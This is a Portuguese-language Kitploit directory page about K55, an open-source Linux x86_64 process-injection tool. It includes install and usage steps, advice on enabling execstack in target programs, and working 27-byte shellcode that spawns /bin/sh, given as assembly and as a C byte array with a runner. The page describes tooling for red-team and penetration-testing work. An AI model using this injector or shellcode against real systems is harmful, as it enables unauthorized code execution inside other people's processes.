Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
K55 — Utilitário de Injeção de Processos para Linux x86_64 | Kitploit
Ferramentas/GitHubGitHub/josh0xa/k55
ExploraçãoShellcodeRed Teaming
GitHubjosh0xa/k55

K55

Utilitário de Injeção de Processos para Linux x86_64

Ver Repositório
59134há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

K55 - Utilitário de Injeção de Processos Linux x86_64 (C++14)

lisence

Sobre o K55

(pronunciado: "kay fifty-five")
O K55 é uma ferramenta de injeção de payloads usada para injetar payloads de shellcode x86_64 em processos em execução. O utilitário foi desenvolvido usando técnicas modernas de C++11, bem como algumas funções tradicionais C do Linux, como ptrace(). O shellcode gerado no processo alvo tem 27 bytes e executa /bin/sh (gera um shell bash) dentro do espaço de endereço do alvo. No futuro, permitirei que os usuários insiram seu próprio shellcode via argumentos de linha de comando.

Instalação

  1. git clone https://github.com/josh0xA/K55.git
  2. cd K55
  3. chmod +x build-install.sh
Baixar ferramenta

  • ./build-install.sh
  • Uso do K55

    Usage: ./K55 <process-name>

    • process-name pode ser qualquer processo Linux com permissões r-xp ou execstack.

    Testes

    Teste 1) Em um terminal (diretório K55/), execute: ./k55_example_process/k55_test_process
    Teste 2) Em outro terminal, execute o injetor: sudo ./K55 k55_test_process

    K55 em Ação

    • Um shell é gerado no k55_test_process quando o injetor de shellcode K55 é executado (como root).

    Injetando no Processo Dado

    Shell Gerado no Alvo

    Limitações

    Obviamente, as chamadas ptrace(PTRACE_POKETEXT...) não são as mais disfarçadas. Portanto, alguns aplicativos podem limitar o efeito do K55. No entanto, para testes de segurança, certifique-se de ativar o execstack para seus aplicativos alvo. Por exemplo, se estou testando no gdb, antes de injetar, executaria o seguinte: sudo execstack -s /usr/bin/gdb. Instale o execstack pelo gerenciador de pacotes da sua distribuição. Para usuários de Arch Linux, você pode encontrar o execstack no AUR.

    Criando o Payload do Shell

    Nota: A seguir está uma demonstração. A string do payload já está codificada no K55.

    Implementação em Assembly do Payload (Citado do shell-storm (redirecionamento))

    root@kitploit:~
    main:
        xor eax, eax
        mov rbx, 0xFF978CD091969DD1
        neg rbx
        push rbx
        push rsp
        pop rdi
        cdq
        push rdx
        push rdi
        push rsp
        pop rsi
        mov al, 0x3b
        syscall
    

    Implementação em C do Payload

    root@kitploit:~
    #include <stdio.h>
    #include <string.h>
    
    // Shellcode breakdown of the assembly code.
    char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
    
    int main()
    {
        printf("len:%d bytes\n", strlen(code));
        (*(void(*)()) code)();
        return 0;
    }
    
    

    Referências

    http://shell-storm.org/shellcode/files/shellcode-806.php
    https://0x00sec.org/t/linux-infecting-running-processes/1097

    Licença

    Licença MIT
    Copyright (c) Josh Schiavone